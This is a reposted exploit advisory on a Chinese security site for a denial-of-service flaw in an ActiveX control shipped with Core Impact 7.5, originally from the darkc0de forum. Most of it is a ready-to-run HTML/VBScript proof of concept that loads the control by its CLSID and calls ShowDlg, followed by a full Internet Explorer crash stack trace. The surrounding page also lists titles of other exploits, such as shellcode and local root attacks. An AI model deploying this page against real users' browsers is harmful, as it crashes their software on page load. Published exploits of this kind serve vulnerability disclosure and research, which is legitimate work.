首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Core Impact 7.5 Denial of Service Vulnerability
来源:forum.darkc0de.com 作者:Arora 发布时间:2010-02-22  

################################################################
#       .___             __          _______       .___        #
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    #
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   #
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   #
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   #
#        \/                  \/             \/                 #
#                   ___________   ______  _  __                #
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                #
#                 \  \___|  | \/\  ___/\     /                 #
#                  \___  >__|    \___  >\/\_/                  #
#      est.2007        \/            \/   forum.darkc0de.com   #
################################################################
# Greetz to all Darkc0de ,AI, AH,ICW Memebers
#Shoutz to r45c4l,j4ckh4x0r,silic0n,smith,baltazar,d3hydr8,FB1H2S, lowlz,Eberly,Sumit,zerocode,dalsim,7, Anirban , Anas, Navneet ,Varun, Dilip, Manish
#Special Thanks to r45c4l for allowing analysis on his product

#RegKey Safe for Script: False
#RegKey Safe for Init: False

#Implements IObjectSafety: True

<html>
Test DoS Page
<object classid='clsid:CDF8A044-74AF-4045-AE13-D8AEDF802538' id='target' ></object>
<script language='vbscript'>
arg1=String(1, "A")
target.ShowDlg arg1
</script>


Access violation exception (0xC0000005) when trying to read from memory location 0x00000020 in the thread below.

Function          Arg 1     Arg 2     Arg 3   Source
TargetControl+145d0        0000000f     00000000     00000000   
mfc80u!CWnd::WindowProc+22    0000000f     00000000     00000000   
mfc80u!AfxCallWndProc+a3       00000000     003008d0     0000000f   
mfc80u!AfxWndProc+35        003008d0     0000000f     00000000   
TargetControl!DllGetClassObject+c1a2      003008d0     0000000f     00000000   
user32!InternalCallWinProc+28       05987d5f     003008d0     0000000f   
user32!UserCallWinProcCheckWow+150       03c6a110     05987d5f     003008d0   
user32!DispatchClientMessage+a3       0068d978     0000000f     00000000   
user32!__fnDWORD+24     0013debc       00000018     0068d978   
ntdll!KiUserCallbackDispatcher+13       7e42aedc     003e08f6     0000005e   
user32!NtUserCallHwndLock+c       003e08f6     0694e16c     0013df74   
mfc80u!CWnd::RunModalLoop+77       00000004     4aba760d     00000000   
mfc80u!CDialog::DoModal+129       4ab791a2     05540874     00000000   
TargetControl+ef9f     0694db40      0000001c     00000004   
oleaut32!CTypeInfo2::Invoke+234       03c7491c     0694db40     00000000   
TargetControl+11c58     0694db40       00000001     00000409   
mshtml!COleSite::ContextInvokeEx+149      0414b6f0     00000001     00000409   
mshtml!COleSite::ContextThunk_InvokeEx+44      0414b6f0     00000001     00000409   
vbscript!IDispatchExInvokeEx2+a9       0003b8d8     0414ce50     00000001   
vbscript!IDispatchExInvokeEx+56       0003b8d8     0414ce50     00000001   
vbscript!InvokeDispatch+101       0003b8d8     0003b990     00000001   
vbscript!InvokeByName+42        0003b8d8     0414ce50     00000001   
vbscript!CScriptRuntime::RunNoEH+234c      0013e6a4     4aab5064     00000000   
vbscript!CScriptRuntime::Run+62       0013e6a4     0003fd08     0003b8d8   
vbscript!CScriptEntryPoint::Call+51      0013e6a4     00000000     00000000   
vbscript!CSession::Execute+c8       0003fd08     0013e888     00000000   
vbscript!COleScript::ExecutePendingScripts+144  0013e888     0013e868     0003e454   
vbscript!COleScript::ParseScriptTextCore+243    0414cd54     0414a394     00000000   
vbscript!COleScript::ParseScriptText+2b      0003e454     0414cd54     0414a394   
mshtml!CScriptCollection::ParseScriptText+1da   0414ca90     73301e34     00000000   
mshtml!CScriptElement::CommitCode+1e1      00000000     00000000     00000000   
mshtml!CScriptElement::Execute+a4       0414a520     06194d97     00000000   
mshtml!CHtmParse::Execute+41       0414a5e0     0414a520     7dcc4b65   
mshtml!CHtmPost::Broadcast+d       7dcc4b83     06194d97     0414a520   
mshtml!CHtmPost::Exec+32b        06194d97     0414a520     04140810   
mshtml!CHtmPost::Run+12        06194d97     04140810     06194ccf   
mshtml!PostManExecute+51        04140810     06194d97     0414a520   
mshtml!PostManOnTimer+76        00250938     00000113     00001003   
user32!InternalCallWinProc+28       7dcfb9d8     00250938     00000113   
user32!UserCallWinProc+f3        00000000     7dcfb9d8     00250938   
user32!DispatchMessageWorker+10e       0013eb90     00000000     0013eb78   
user32!DispatchMessageW+f        0013eb90     00000000     00163468   
browseui!TimedDispatchMessage+33       0013eb90     0013ee98     00000000   
browseui!BrowserThreadProc+336       00162ca8     0013ee98     00162ca8   
browseui!BrowserProtectedThreadProc+50      00162ca8     00162ca8     00000000   
browseui!SHOpenFolderWindow+22c       00162ca8     00000000     00000000   
shdocvw!IEWinMain+133        001523ba     00000001     0140d0b8   
iexplore!WinMainT+2de        00400000     00000000     001523ba   
iexplore!_ModuleEntry+99        0140d0b8     00000018     7ffdf000   
kernel32!BaseProcessStart+23       00402451     00000000     78746341   


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Radasm v2.2.1.6 (.rap) Univers
·Radasm v2.2.1.6 .rap file Loca
·Radasm .rap file local buffer
·Win32 Shellcode (cmd.exe) for
·CastRipper 2.50.70 (.asx) Play
·Win32 Shellcode (cmd.exe) for
·Open & Compact FTPd Pre-Authen
·WM Downloader v3.0.0.9 PLS PLA
·Hyleos ChemView v1.9.5.1 Activ
·feedDemon v3.1.0.9 opml File B
·Browser address bar characters
·Microsoft Internet Explorer ve
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved